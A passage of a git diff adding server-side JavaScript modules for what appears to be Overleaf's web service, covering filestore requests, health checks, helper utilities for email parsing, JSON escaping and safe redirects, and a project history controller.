timeout: FIVE_MINS_IN_MS, + headers: { + 'X-File-Hash-From-Web': fileArgs.hash, + }, // send the hash to the filestore as a custom header so it can be checked + } + const writeStream = request(opts) + writeStream.on('error', function (err) { + logger.warn( + { err, projectId, fileId, fsPath }, + 'something went wrong on the write stream of uploadFileFromDisk' + ) + callbackOnce(err) + }) + writeStream.on('response', function (response) { + if (![200, 201].includes(response.statusCode)) { + const err = new OError( + `non-ok response from filestore for upload: ${response.statusCode}`, + { statusCode: response.statusCode } + ) + return callbackOnce(err) + } + callbackOnce(null, { url, fileRef }) + }) // have to pass back an object because async.retry only accepts a single result argument + readStream.pipe(writeStream) + }) + }, + + getFileStreamNew(project, file, query, callback) { + const projectId = project._id + const historyId = project.overleaf?.history?.id + const fileId = file._id + const hash = file.hash + if (historyId && hash && Features.hasFeature('project-history-blobs')) { + // new behaviour - request from history + const range = _extractRange(query?.range) + HistoryManager.requestBlobWithFallback( + projectId, + hash, + fileId, + 'GET', + range, + function (err, result) { + if (err) { + return callback(err) + } + const { stream } = result + callback(null, stream) + } + ) + } else { + // original behaviour + FileStoreHandler.getFileStream(projectId, fileId, query, callback) + } + }, + + getFileStream(projectId, fileId, query, callback) { + if (!Features.hasFeature('filestore')) { + return callback( + new Errors.NotFoundError('filestore is disabled, file not found') + ) + } + + let queryString = '?from=getFileStream' + if (query != null && query.format != null) { + queryString += `&format=${query.format}` + } + const opts = { + method: 'get', + uri: `${this._buildUrl(projectId, fileId)}${queryString}`, + timeout: FIVE_MINS_IN_MS, + headers: {}, + } + if (query != null && query.range != null) { + const rangeText = query.range + if (rangeText && rangeText.match != null && rangeText.match(/\d+-\d+/)) { + opts.headers.range = `bytes=${query.range}` + } + } + const readStream = request(opts) + readStream.on('error', err => + logger.err( + { err, projectId, fileId, query, opts }, + 'error in file stream' + ) + ) + callback(null, readStream) + }, + + getFileSize(projectId, fileId, callback) { + const url = this._buildUrl(projectId, fileId) + request.head(`${url}?from=getFileSize`, (err, res) => { + if (err) { + OError.tag(err, 'failed to get file size from filestore', { + projectId, + fileId, + }) + return callback(err) + } + if (res.statusCode === 404) { + return callback(new Errors.NotFoundError('file not found in filestore')) + } + if (res.statusCode !== 200) { + logger.warn( + { projectId, fileId, statusCode: res.statusCode }, + 'filestore returned non-200 response' + ) + return callback(new Error('filestore returned non-200 response')) + } + const fileSize = res.headers['content-length'] + callback(null, fileSize) + }) + }, + + deleteFile(projectId, fileId, callback) { + logger.debug({ projectId, fileId }, 'telling file store to delete file') + const opts = { + method: 'delete', + uri: this._buildUrl(projectId, fileId), + timeout: FIVE_MINS_IN_MS, + } + request(opts, function (err, response) { + if (err) { + logger.warn( + { err, projectId, fileId }, + 'something went wrong deleting file from filestore' + ) + } + callback(err) + }) + }, + + deleteProject(projectId, callback) { + if (!Features.hasFeature('filestore')) { + return callback() // if filestore is not in use, we don't need to delete anything + } + request( + { + method: 'delete', + uri: this._buildUrl(projectId), + timeout: FIVE_MINS_IN_MS, + }, + err => { + if (err) { + return callback( + OError.tag( + err, + 'something went wrong deleting a project in filestore', + { projectId } + ) + ) + } + callback() + } + ) + }, + + copyFile(oldProjectId, oldFileId, newProjectId, newFileId, callback) { + logger.debug( + { oldProjectId, oldFileId, newProjectId, newFileId }, + 'telling filestore to copy a file' + ) + const opts = { + method: 'put', + json: { + source: { + project_id: oldProjectId, + file_id: oldFileId, + }, + }, + uri: this._buildUrl(newProjectId, newFileId), + timeout: FIVE_MINS_IN_MS, + } + request(opts, function (err, response) { + if (err) { + OError.tag( + err, + 'something went wrong telling filestore api to copy file', + { + oldProjectId, + oldFileId, + newProjectId, + newFileId, + } + ) + callback(err) + } else if (response.statusCode >= 200 && response.statusCode < 300) { + // successful response + callback(null, opts.uri) + } else { + err = new OError( + `non-ok response from filestore for copyFile: ${response.statusCode}`, + { + uri: opts.uri, + statusCode: response.statusCode, + } + ) + callback(err) + } + }) + }, + + _buildUrl(projectId, fileId) { + return ( + `${settings.apis.filestore.url}/project/${projectId}` + + (fileId ? `/file/${fileId}` : '') + ) + }, +} + +function _extractRange(range) { + if (typeof range === 'string' && /\d+-\d+/.test(range)) { + return `bytes=${range}` + } +} + +module.exports = FileStoreHandler +module.exports.promises = promisifyAll(FileStoreHandler, { + multiResult: { + uploadFileFromDisk: ['url', 'fileRef', 'createdBlob'], + uploadFileFromDiskWithHistoryId: ['url', 'fileRef', 'createdBlob'], + }, +}) diff --git a/services/web/app/src/Features/GlobalMetrics/GlobalMetricsManager.js b/services/web/app/src/Features/GlobalMetrics/GlobalMetricsManager.js new file mode 100644 index 0000000..75cbca1 --- /dev/null +++ b/services/web/app/src/Features/GlobalMetrics/GlobalMetricsManager.js @@ -0,0 +1,38 @@ +const { GlobalMetric } = require('../../models/GlobalMetric') +/** + * A Generic collection used to track metrics shared across the entirety of the application + * examples: + * - a metric to measure how many signups we have for an expensive labs experiment, so we can end stop signups + * - a metric to measure how many users have been added to a test, so we can stop adding more once a cap is reached + * + */ + +async function getMetric(key, defaultValue = 0) { + const metric = await GlobalMetric.findById(key) + if (!metric) { + return defaultValue + } + return metric.value +} + +async function setMetric(key, value) { + return await GlobalMetric.findOneAndUpdate( + { _id: key }, + { $set: { value } }, + { new: true, upsert: true } + ) +} + +async function incrementMetric(key, value = 1) { + return await GlobalMetric.findOneAndUpdate( + { _id: key }, + { $inc: { value } }, + { new: true, upsert: true, setDefaultsOnInsert: true } + ) +} + +module.exports = { + getMetric, + setMetric, + incrementMetric, +} diff --git a/services/web/app/src/Features/HealthCheck/HealthCheckController.mjs b/services/web/app/src/Features/HealthCheck/HealthCheckController.mjs new file mode 100644 index 0000000..a6de9e5 --- /dev/null +++ b/services/web/app/src/Features/HealthCheck/HealthCheckController.mjs @@ -0,0 +1,125 @@ +import RedisWrapper from '../../infrastructure/RedisWrapper.js' +import settings from '@overleaf/settings' +import logger from '@overleaf/logger' +import UserGetter from '../User/UserGetter.js' +import { + SmokeTestFailure, + runSmokeTests, +} from './../../../../test/smoke/src/SmokeTests.js' + +const rclient = RedisWrapper.client('health_check') + +export default { + check(req, res, next) { + if (!settings.siteIsOpen || !settings.editorIsOpen) { + // always return successful health checks when site is closed + res.sendStatus(200) + } else { + // detach from express for cleaner stack traces + setTimeout(() => runSmokeTestsDetached(req, res).catch(next)) + } + }, + + checkActiveHandles(req, res, next) { + if (!(settings.maxActiveHandles > 0) || !process._getActiveHandles) { + return next() + } + const activeHandlesCount = (process._getActiveHandles() || []).length + if (activeHandlesCount > settings.maxActiveHandles) { + logger.err( + { activeHandlesCount, maxActiveHandles: settings.maxActiveHandles }, + 'exceeded max active handles, failing health check' + ) + return res.sendStatus(500) + } else { + logger.debug( + { activeHandlesCount, maxActiveHandles: settings.maxActiveHandles }, + 'active handles are below maximum' + ) + next() + } + }, + + checkApi(req, res, next) { + rclient.healthCheck(err => { + if (err) { + logger.err({ err }, 'failed api redis health check') + return res.sendStatus(500) + } + if (!settings.smokeTest.userId) { + logger.err({}, 'smokeTest.userId is undefined in health check') + return res.sendStatus(404) + } + UserGetter.getUserEmail(settings.smokeTest.userId, (err, email) => { + if (err) { + logger.err({ err }, 'failed api mongo health check') + return res.sendStatus(500) + } + if (email == null) { + logger.err({ err }, 'failed api mongo health check (no email)') + return res.sendStatus(500) + } + res.sendStatus(200) + }) + }) + }, + + checkRedis(req, res, next) { + return rclient.healthCheck(function (error) { + if (error != null) { + logger.err({ err: error }, 'failed redis health check') + return res.sendStatus(500) + } else { + return res.sendStatus(200) + } + }) + }, + + checkMongo(req, res, next) { + return UserGetter.getUserEmail( + settings.smokeTest.userId, + function (err, email) { + if (err != null) { + logger.err({ err }, 'mongo health check failed, error present') + return res.sendStatus(500) + } else if (email == null) { + logger.err( + { err }, + 'mongo health check failed, no emai present in find result' + ) + return res.sendStatus(500) + } else { + return res.sendStatus(200) + } + } + ) + }, +} + +async function runSmokeTestsDetached(req, res) { + function isAborted() { + return req.destroyed + } + const stats = { start: new Date(), steps: [] } + let status, response + try { + try { + await runSmokeTests({ isAborted, stats }) + } finally { + stats.end = new Date() + stats.duration = stats.end - stats.start + } + status = 200 + response = { stats } + } catch (e) { + let err = e + if (!(e instanceof SmokeTestFailure)) { + err = new SmokeTestFailure('low level error', {}, e) + } + logger.err({ err, stats }, 'health check failed') + status = 500 + response = { stats, error: err.message } + } + if (isAborted()) return + res.status(status).json(response) +} diff --git a/services/web/app/src/Features/Helpers/AdminAuthorizationHelper.js b/services/web/app/src/Features/Helpers/AdminAuthorizationHelper.js new file mode 100644 index 0000000..6a86e53 --- /dev/null +++ b/services/web/app/src/Features/Helpers/AdminAuthorizationHelper.js @@ -0,0 +1,19 @@ +const Settings = require('@overleaf/settings') + +module.exports = { + hasAdminAccess, + canRedirectToAdminDomain, +} + +function hasAdminAccess(user) { + if (!Settings.adminPrivilegeAvailable) return false + if (!user) return false + return Boolean(user.isAdmin) +} + +function canRedirectToAdminDomain(user) { + if (Settings.adminPrivilegeAvailable) return false + if (!Settings.adminUrl) return false + if (!user) return false + return Boolean(user.isAdmin) +} diff --git a/services/web/app/src/Features/Helpers/AsyncFormHelper.js b/services/web/app/src/Features/Helpers/AsyncFormHelper.js new file mode 100644 index 0000000..8b8a3b6 --- /dev/null +++ b/services/web/app/src/Features/Helpers/AsyncFormHelper.js @@ -0,0 +1,17 @@ +const { + acceptsJson, +} = require('../../infrastructure/RequestContentTypeDetection') + +module.exports = { + redirect, +} + +// redirect the request via headers or JSON response depending on the request +// format +function redirect(req, res, redir) { + if (acceptsJson(req)) { + res.json({ redir }) + } else { + res.redirect(redir) + } +} diff --git a/services/web/app/src/Features/Helpers/AuthorizationHelper.js b/services/web/app/src/Features/Helpers/AuthorizationHelper.js new file mode 100644 index 0000000..f193398 --- /dev/null +++ b/services/web/app/src/Features/Helpers/AuthorizationHelper.js @@ -0,0 +1,44 @@ +const { UserSchema } = require('../../models/User') +const SplitTestHandler = require('../SplitTests/SplitTestHandler') +const ProjectGetter = require('../Project/ProjectGetter') +const { callbackify } = require('@overleaf/promise-utils') + +module.exports = { + hasAnyStaffAccess, + isReviewerRoleEnabled: callbackify(isReviewerRoleEnabled), + promises: { + isReviewerRoleEnabled, + }, +} + +function hasAnyStaffAccess(user) { + if (!user.staffAccess) { + return false + } + + for (const key of Object.keys(UserSchema.obj.staffAccess)) { + if (user.staffAccess[key]) return true + } + return false +} + +async function isReviewerRoleEnabled(projectId) { + const project = await ProjectGetter.promises.getProject(projectId, { + reviewer_refs: 1, + owner_ref: 1, + }) + + // if there are reviewers, it means the role is enabled + if (Object.keys(project.reviewer_refs || {}).length > 0) { + return true + } + + // if there are no reviewers, check split test from project owner + const reviewerRoleAssigment = + await SplitTestHandler.promises.getAssignmentForUser( + project.owner_ref, + 'reviewer-role' + ) + + return reviewerRoleAssigment.variant === 'enabled' +} diff --git a/services/web/app/src/Features/Helpers/DiffHelper.js b/services/web/app/src/Features/Helpers/DiffHelper.js new file mode 100644 index 0000000..c2d1d73 --- /dev/null +++ b/services/web/app/src/Features/Helpers/DiffHelper.js @@ -0,0 +1,55 @@ +const MAX_LENGTH = 254 + +function _calculateRatio(matches, length) { + if (length) { + const ratio = (2.0 * matches) / length + const rounded = Math.floor(ratio * 100) / 100 + return rounded + } + return 1.0 +} + +/** + * Ported from python's `difflib`: + * https://github.com/python/cpython/blob/0415cf895f96ae3f896f1f25f0c030a820845e13/Lib/difflib.py#L622-L649 + * + * Accepts two strings, `a` and `b`, and returns a float ratio + * corresponding (approximatey) to the overlap between the strings. + * Identical strings produce 1.0, completely different strings produce 0.0 + * */ +function stringSimilarity(a, b) { + if ( + typeof a !== 'string' || + typeof b !== 'string' || + a.length > MAX_LENGTH || + b.length > MAX_LENGTH + ) { + throw new Error('Invalid input to quickMatchRatio') + } + // Count how many times each character occurs in `b` + const fullBCount = {} + b.split('').forEach(e => { + fullBCount[e] = (fullBCount[e] || 0) + 1 + }) + // avail[x] is the number of times x appears in 'b' less the + // number of times we've seen it in 'a' so far ... kinda + const avail = {} + let matches = 0 + a.split('').forEach(e => { + let n = null + if (Object.hasOwn(avail, e)) { + n = avail[e] + } else { + n = fullBCount[e] || 0 + } + avail[e] = n - 1 + if (n > 0) { + matches = matches + 1 + } + }) + return _calculateRatio(matches, a.length + b.length) +} + +module.exports = { + stringSimilarity, +} diff --git a/services/web/app/src/Features/Helpers/EmailHelper.js b/services/web/app/src/Features/Helpers/EmailHelper.js new file mode 100644 index 0000000..80b96df --- /dev/null +++ b/services/web/app/src/Features/Helpers/EmailHelper.js @@ -0,0 +1,42 @@ +const { parseOneAddress } = require('email-addresses') + +// available for frontend in https://github.com/overleaf/internal/blob/19d432c70b173752ee7c6d8978dd6be16b042921/services/web/frontend/js/shared/utils/email.tsx#L4 +const EMAIL_REGEXP = + // eslint-disable-next-line no-useless-escape + /^([^<>()[\]\\.,;:\s@\"]+(\.[^<>()[\]\\.,;:\s@\"]+)*)@((\[[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\])|(([a-zA-Z\-0-9]+\.)+[a-zA-Z]{2,}))$/ + +function getDomain(email) { + email = parseEmail(email) + return email ? email.split('@').pop() : null +} + +function parseEmail(email, parseRfcAddress = false) { + if (typeof email !== 'string' || !email) { + return null + } + + if (parseRfcAddress) { + const result = parseOneAddress(email) + if (!result?.address) { + return null + } + email = result.address + } + + if (email.length > 254) { + return null + } + email = email.trim().toLowerCase() + + const matched = email.match(EMAIL_REGEXP) + if (matched == null || matched[0] == null) { + return null + } + + return matched[0] +} + +module.exports = { + getDomain, + parseEmail, +} diff --git a/services/web/app/src/Features/Helpers/Mongo.js b/services/web/app/src/Features/Helpers/Mongo.js new file mode 100644 index 0000000..3ec083a --- /dev/null +++ b/services/web/app/src/Features/Helpers/Mongo.js @@ -0,0 +1,54 @@ +const OError = require('@overleaf/o-error') +const { ObjectId } = require('mongodb-legacy') +const { ObjectId: MongooseObjectId } = require('mongoose').mongo + +function _getObjectIdInstance(id) { + if (typeof id === 'string') { + return new ObjectId(id) + } else if (id instanceof ObjectId) { + return id + } else if (id instanceof MongooseObjectId) { + return new ObjectId(id.toString()) + } else { + throw new OError('unexpected object id', { id }) + } +} + +function normalizeQuery(query) { + if (!query) { + throw new Error('no query provided') + } + if ( + typeof query === 'string' || + query instanceof ObjectId || + query instanceof MongooseObjectId + ) { + return { _id: _getObjectIdInstance(query) } + } else if (typeof query._id === 'string') { + query._id = new ObjectId(query._id) + return query + } else { + return query + } +} + +function normalizeMultiQuery(query) { + if (query instanceof Set) { + query = Array.from(query) + } + if (Array.isArray(query)) { + return { _id: { $in: query.map(id => _getObjectIdInstance(id)) } } + } else { + return normalizeQuery(query) + } +} + +function isObjectIdInstance(id) { + return id instanceof ObjectId || id instanceof MongooseObjectId +} + +module.exports = { + isObjectIdInstance, + normalizeQuery, + normalizeMultiQuery, +} diff --git a/services/web/app/src/Features/Helpers/SafeHTMLSubstitution.js b/services/web/app/src/Features/Helpers/SafeHTMLSubstitution.js new file mode 100644 index 0000000..4ae40d8 --- /dev/null +++ b/services/web/app/src/Features/Helpers/SafeHTMLSubstitution.js @@ -0,0 +1,46 @@ +const pug = require('pug-runtime') + +const SPLIT_REGEX = /<(\d+)>(.*?)<\/\1>/g + +function render(locale, components) { + const output = [] + function addPlainText(text) { + if (!text) return + output.push(pug.escape(text)) + } + + // 'PRE<0>INNER</0>POST' -> ['PRE', '0', 'INNER', 'POST'] + // '<0>INNER</0>' -> ['', '0', 'INNER', ''] + // '<0></0>' -> ['', '0', '', ''] + // '<0>INNER</0><0>INNER2</0>' -> ['', '0', 'INNER', '', '0', 'INNER2', ''] + // '<0><1>INNER</1></0>' -> ['', '0', '<1>INNER</1>', ''] + // 'PLAIN TEXT' -> ['PLAIN TEXT'] + // NOTE: a test suite is verifying these cases: SafeHTMLSubstituteTests + const chunks = locale.split(SPLIT_REGEX) + + // extract the 'PRE' chunk + addPlainText(chunks.shift()) + + while (chunks.length) { + // each batch consists of three chunks: ['0', 'INNER', 'POST'] + const [idx, innerChunk, intermediateChunk] = chunks.splice(0, 3) + + const component = components[idx] + const componentName = + typeof component === 'string' ? component : component.name + // pug is doing any necessary escaping on attribute values + const attributes = (component.attrs && pug.attrs(component.attrs)) || '' + output.push( + `<${componentName + attributes}>`, + ...render(innerChunk, components), + `</${componentName}>` + ) + addPlainText(intermediateChunk) + } + return output.join('') +} + +module.exports = { + SPLIT_REGEX, + render, +} diff --git a/services/web/app/src/Features/Helpers/StringHelper.js b/services/web/app/src/Features/Helpers/StringHelper.js new file mode 100644 index 0000000..47f71df --- /dev/null +++ b/services/web/app/src/Features/Helpers/StringHelper.js @@ -0,0 +1,30 @@ +/* eslint-disable + max-len, + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +let StringHelper +const JSON_ESCAPE_REGEXP = /[\u2028\u2029&><]/g + +const JSON_ESCAPE = { + '&': '\\u0026', + '>': '\\u003e', + '<': '\\u003c', + '\u2028': '\\u2028', + '\u2029': '\\u2029', +} + +module.exports = StringHelper = { + // stringifies and escapes a json object for use in a script. This ensures that &, < and > characters are escaped, + // along with quotes. This ensures that the string can be safely rendered into HTML. See rationale at: + // https://api.rubyonrails.org/classes/ERB/Util.html#method-c-json_escape + // and implementation lifted from: + // https://github.com/ember-fastboot/fastboot/blob/cafd96c48564d8384eb83dc908303dba8ece10fd/src/ember-app.js#L496-L510 + stringifyJsonForScript(object) { + return JSON.stringify(object).replace( + JSON_ESCAPE_REGEXP, + match => JSON_ESCAPE[match] + ) + }, +} diff --git a/services/web/app/src/Features/Helpers/UrlHelper.js b/services/web/app/src/Features/Helpers/UrlHelper.js new file mode 100644 index 0000000..cf68663 --- /dev/null +++ b/services/web/app/src/Features/Helpers/UrlHelper.js @@ -0,0 +1,49 @@ +const Settings = require('@overleaf/settings') +const { URL } = require('url') + +const PROTO = new URL(Settings.siteUrl).protocol + +function getCanonicalURL(req, url) { + const origin = `${PROTO}//${req.headers.host}` + url = new URL(url || req.originalUrl, origin) + if (url.pathname.endsWith('/')) { + url.pathname = url.pathname.replace(/\/+$/, '') + } + url.search = '' + url.hash = '' + return url.href +} + +function getSafeRedirectPath(value) { + const baseURL = Settings.siteUrl // base URL is required to construct URL from path + const url = new URL(value, baseURL) + let safePath = `${url.pathname}${url.search}${url.hash}`.replace(/^\/+/, '/') + if (safePath === '/') { + safePath = undefined + } + return safePath +} + +function getSafeAdminDomainRedirect(path) { + return Settings.adminUrl + (getSafeRedirectPath(path) || '/') +} + +module.exports = { + getCanonicalURL, + getSafeRedirectPath, + getSafeAdminDomainRedirect, + wrapUrlWithProxy(url) { + // TODO: Consider what to do for Community and Enterprise edition? + if (!Settings.apis.linkedUrlProxy.url) { + throw new Error('no linked url proxy configured') + } + return `${Settings.apis.linkedUrlProxy.url}?url=${encodeURIComponent(url)}` + }, + + prependHttpIfNeeded(url) { + if (!url.match('://')) { + url = `http://${url}` + } + return url + }, +} diff --git a/services/web/app/src/Features/History/HistoryBackupDeletionHandler.js b/services/web/app/src/Features/History/HistoryBackupDeletionHandler.js new file mode 100644 index 0000000..8df1bcd --- /dev/null +++ b/services/web/app/src/Features/History/HistoryBackupDeletionHandler.js @@ -0,0 +1,20 @@ +const { fetchNothing } = require('@overleaf/fetch-utils') +const Settings = require('@overleaf/settings') + +async function deleteProject(projectId) { + if (!Settings.apis.historyBackupDeletion.enabled) return + + const url = new URL(Settings.apis.historyBackupDeletion.url) + url.pathname += `project/${projectId}/backup` + await fetchNothing(url, { + method: 'DELETE', + basicAuth: { + user: Settings.apis.historyBackupDeletion.user, + password: Settings.apis.historyBackupDeletion.pass, + }, + }) +} + +module.exports = { + deleteProject, +} diff --git a/services/web/app/src/Features/History/HistoryController.js b/services/web/app/src/Features/History/HistoryController.js new file mode 100644 index 0000000..a0f0183 --- /dev/null +++ b/services/web/app/src/Features/History/HistoryController.js @@ -0,0 +1,502 @@ +// @ts-check + +const { setTimeout } = require('timers/promises') +const { pipeline } = require('stream/promises') +const OError = require('@overleaf/o-error') +const logger = require('@overleaf/logger') +const { expressify } = require('@overleaf/promise-utils') +const { + fetchStream, + fetchStreamWithResponse, + fetchJson, + fetchNothing, + RequestFailedError, +} = require('@overleaf/fetch-utils') +const settings = require('@overleaf/settings') +const SessionManager = require('../Authentication/SessionManager') +const UserGetter = require('../User/UserGetter') +const ProjectGetter = require('../Project/ProjectGetter') +const Errors = require('../Errors/Errors') +const HistoryManager = require('./HistoryManager') +const ProjectDetailsHandler = require('../Project/ProjectDetailsHandler') +const ProjectEntityUpdateHandler = require('../Project/ProjectEntityUpdateHandler') +const RestoreManager = require('./RestoreManager') +const { prepareZipAttachment } = require('../../infrastructure/Response') +const Features = require('../../infrastructure/Features') + +// Number of seconds after which the browser should send a request to revalidate +// blobs +const REVALIDATE_BLOB_AFTER_SECONDS = 86400 // 1 day + +// Number of seconds during which the browser can serve a stale response while +// revalidating +const STALE_WHILE_REVALIDATE_SECONDS = 365 * 86400 // 1 year + +const MAX_HISTORY_ZIP_ATTEMPTS = 40 + +async function getBlob(req, res) { + await requestBlob('GET', req, res) +} + +async function headBlob(req, res) { + await requestBlob('HEAD', req, res) +} + +async function requestBlob(method, req, res) { + const { project_id: projectId, hash } = req.params + + // Handle conditional GET request + if (req.get('If-None-Match') === hash) { + setBlobCacheHeaders(res, hash) + return res.status(304).end() + } + + const range = req.get('Range') + let stream, source, contentLength + try { + ;({ stream, source, contentLength } = + await HistoryManager.promises.requestBlobWithFallback( + projectId, + hash, + req.query.fallback, + method, + range + )) + } catch (err) { + if (err instanceof Errors.NotFoundError) return res.status(404).end() + throw err + } + res.appendHeader('X-Served-By', source) + + if (contentLength) res.setHeader('Content-Length', contentLength) // set on HEAD + res.setHeader('Content-Type', 'application/octet-stream') + setBlobCacheHeaders(res, hash) + + try { + await pipeline(stream, res) + } catch (err) { + // If the downstream request is cancelled, we get an + // ERR_STREAM_PREMATURE_CLOSE, ignore these "errors". + if (!isPrematureClose(err)) { + throw err + } + } +} + +function setBlobCacheHeaders(res, etag) { + // Blobs are immutable, so they can in principle be cached indefinitely. Here, + // we ask the browser to cache them for some time, but then check back + // regularly in case they changed (even though they shouldn't). This is a + // precaution in case a bug makes us send bad data through that endpoint. + res.set( + 'Cache-Control', + `private, max-age=${REVALIDATE_BLOB_AFTER_SECONDS}, stale-while-revalidate=${STALE_WHILE_REVALIDATE_SECONDS}` + ) + res.set('ETag', etag) +} + +async function proxyToHistoryApi(req, res, next) { + const userId = SessionManager.getLoggedInUserId(req.session) + const url = settings.apis.project_history.url + req.url + + const { stream, response } = await fetchStreamWithResponse(url, { + method: req.method, + headers: { 'X-User-Id': userId }, + }) + + const contentType = response.headers.get('Content-Type') + const contentLength = response.headers.get('Content-Length') + if (contentType != null) { + res.set('Content-Type', contentType) + } + if (contentLength != null) { + res.set('Content-Length', contentLength) + } + + try { + await pipeline(stream, res) + } catch (err) { + // If the downstream request is cancelled, we get an + // ERR_STREAM_PREMATURE_CLOSE. + if (!isPrematureClose(err)) { + throw err + } + } +} + +async function proxyToHistoryApiAndInjectUserDetails(req, res, next) { + const userId = SessionManager.getLoggedInUserId(req.session) + const url = settings.apis.project_history.url + req.url + const body = await fetchJson(url, { + method: req.method, + headers: { 'X-User-Id': userId }, + }) + const data = await HistoryManager.promises.injectUserDetails(body) + res.json(data) +} + +async function resyncProjectHistory(req, res, next) { + // increase timeout to 6 minutes + res.setTimeout(6 * 60 * 1000) + const projectId = req.params.Project_id + const opts = {} + const historyRangesMigration = req.body.historyRangesMigration + if (historyRangesMigration) { + opts.historyRangesMigration = historyRangesMigration + } + if (req.body.resyncProjectStructureOnly) { + opts.resyncProjectStructureOnly = req.body.resyncProjectStructureOnly + } + + try { + await ProjectEntityUpdateHandler.promises.resyncProjectHistory( + projectId, + opts + ) + } catch (err) { + if (err instanceof Errors.ProjectHistoryDisabledError) { + return res.sendStatus(404) + } else { + throw err + } + } + + res.sendStatus(204) +} + +async function restoreFileFromV2(req, res, next) { + const { project_id: projectId } = req.params + const { version, pathname } = req.body + const userId = SessionManager.getLoggedInUserId(req.session) + + const entity = await RestoreManager.promises.restoreFileFromV2( + userId, + projectId, + version, + pathname + ) + + res.json({ + type: entity.type, + id: entity._id, + }) +} + +async function revertFile(req, res, next) { + const { project_id: projectId } = req.params + const { version, pathname } = req.body + const userId = SessionManager.getLoggedInUserId(req.session) + + const entity = await RestoreManager.promises.revertFile( + userId, + projectId, + version, + pathname, + {} + ) + + res.json({ + type: entity.type, + id: entity._id, + }) +} + +async function revertProject(req, res, next) { + const { project_id: projectId } = req.params + const { version } = req.body + const userId = SessionManager.getLoggedInUserId(req.session) + + await RestoreManager.promises.revertProject(userId, projectId, version) + + res.sendStatus(200) +} + +async function getLabels(req, res, next) { + const projectId = req.params.Project_id + + let labels = await fetchJson( + `${settings.apis.project_history.url}/project/${projectId}/labels` + ) + labels = await _enrichLabels(labels) + + res.json(labels) +} + +async function createLabel(req, res, next) { + const projectId = req.params.Project_id + const { comment, version } = req.body + const userId = SessionManager.getLoggedInUserId(req.session) + + let label = await fetchJson( + `${settings.apis.project_history.url}/project/${projectId}/labels`, + { + method: 'POST', + json: { comment, version, user_id: userId }, + } + ) + label = await _enrichLabel(label) + + res.json(label) +} + +async function _enrichLabel(label) { + const newLabel = Object.assign({}, label) + if (!label.user_id) { + newLabel.user_display_name = _displayNameForUser(null) + return newLabel + } + + const user = await UserGetter.promises.getUser(label.user_id, { + first_name: 1, + last_name: 1, + email: 1, + }) + newLabel.user_display_name = _displayNameForUser(user) + return newLabel +} + +async function _enrichLabels(labels) { + if (!labels || !labels.length) { + return [] + } + const uniqueUsers = new Set(labels.map(label => label.user_id)) + + // For backwards compatibility, and for anonymously created labels in SP + // expect missing user_id fields + uniqueUsers.delete(undefined) + + if (!uniqueUsers.size) { + return labels + } + + const rawUsers = await UserGetter.promises.getUsers(Array.from(uniqueUsers), { + first_name: 1, + last_name: 1, + email: 1, + }) + const users = new Map(rawUsers.map(user => [String(user._id), user])) + + labels.forEach(label => { + const user = users.get(label.user_id) + label.user_display_name = _displayNameForUser(user) + }) + return labels +} + +function _displayNameForUser(user) { + if (user == null) { + return 'Anonymous' + } + if (user.name) { + return user.name + } + let name = [user.first_name, user.last_name] + .filter(n => n != null) + .join(' ') + .trim() + if (name === '') { + name = user.email.split('@')[0] + } + if (!name) { + return '?' + } + return name +} + +async function deleteLabel(req, res, next) { + const { Project_id: projectId, label_id: labelId } = req.params + const userId = SessionManager.getLoggedInUserId(req.session) + + const project = await ProjectGetter.promises.getProject(projectId, { + owner_ref: true, + }) + + // If the current user is the project owner, we can use the non-user-specific + // delete label endpoint. Otherwise, we have to use the user-specific version + // (which only deletes the label if it is owned by the user) + const deleteEndpointUrl = project.owner_ref.equals(userId) + ? `${settings.apis.project_history.url}/project/${projectId}/labels/${labelId}` + : `${settings.apis.project_history.url}/project/${projectId}/user/${userId}/labels/${labelId}` + + await fetchNothing(deleteEndpointUrl, { + method: 'DELETE', + }) + res.sendStatus(204) +} + +async function downloadZipOfVersion(req, res, next) { + const { project_id: projectId, version } = req.params + + const project = await ProjectDetailsHandler.promises.getDetails(projectId) + const v1Id = + project.overleaf && project.overleaf.history && project.overleaf.history.id + + if (v1Id == null) { + logger.error( + { projectId, version }, + 'got request for zip version of non-v1 history project' + ) + return res.sendStatus(402) + } + + await _pipeHistoryZipToResponse( + v1Id, + version, + `${project.name} (Version ${version})`, + req, + res + ) +} + +async function _pipeHistoryZipToResponse(v1ProjectId, version, name, req, res) { + if (req.destroyed) { + // client has disconnected -- skip project history api call and download + return + } + // increase timeout to 6 minutes + res.setTimeout(6 * 60 * 1000) + const url = `${settings.apis.v1_history.url}/projects/${v1ProjectId}/version/${version}/zip` + const basicAuth = { + user: settings.apis.v1_history.user, + password: settings.apis.v1_history.pass, + } + + if (!Features.hasFeature('saas')) { + let stream + try { + stream = await fetchStream(url, { basicAuth }) + } catch (err) { + if (err instanceof RequestFailedError && err.response.status === 404) { + return res.sendStatus(404) + } else { + throw err + } + } + + prepareZipAttachment(res, `${name}.zip`) + + try { + await pipeline(stream, res) + } catch (err) { + // If the downstream request is cancelled, we get an + // ERR_STREAM_PREMATURE_CLOSE. + if (!isPrematureClose(err)) { + throw err + } + } + return + } + + let body + try { + body = await fetchJson(url, { method: 'POST', basicAuth }) + } catch (err) { + if (err instanceof RequestFailedError && err.response.status === 404) { + throw new Errors.NotFoundError('zip not found') + } else { + throw err + } + } + + if (req.destroyed) { + // client has disconnected -- skip delayed s3 download + return + } + + if (!body.zipUrl) { + throw new OError('Missing zipUrl, cannot fetch zip file', { + v1ProjectId, + body, + }) + } + + // retry for about 6 minutes starting with short delay + let retryDelay = 2000 + let attempt = 0 + while (true) { + attempt += 1 + await setTimeout(retryDelay) + + if (req.destroyed) { + // client has disconnected -- skip s3 download + return + } + + // increase delay by 1 second up to 10 + if (retryDelay < 10000) { + retryDelay += 1000 + } + + try { + const stream = await fetchStream(body.zipUrl) + prepareZipAttachment(res, `${name}.zip`) + await pipeline(stream, res) + } catch (err) { + if (attempt > MAX_HISTORY_ZIP_ATTEMPTS) { + throw err + } + + if (err instanceof RequestFailedError && err.response.status === 404) { + // File not ready yet. Retry. + continue + } else if (isPrematureClose(err)) { + // Downstream request cancelled. Retry. + continue + } else { + // Unknown error. Log and retry. + logger.warn( + { err, v1ProjectId, version, retryAttempt: attempt }, + 'history s3 proxying error' + ) + continue + } + } + + // We made it through. No need to retry anymore. Exit loop + break + } +} + +async function getLatestHistory(req, res, next) { + const projectId = req.params.project_id + const history = await HistoryManager.promises.getLatestHistory(projectId) + res.json(history) +} + +async 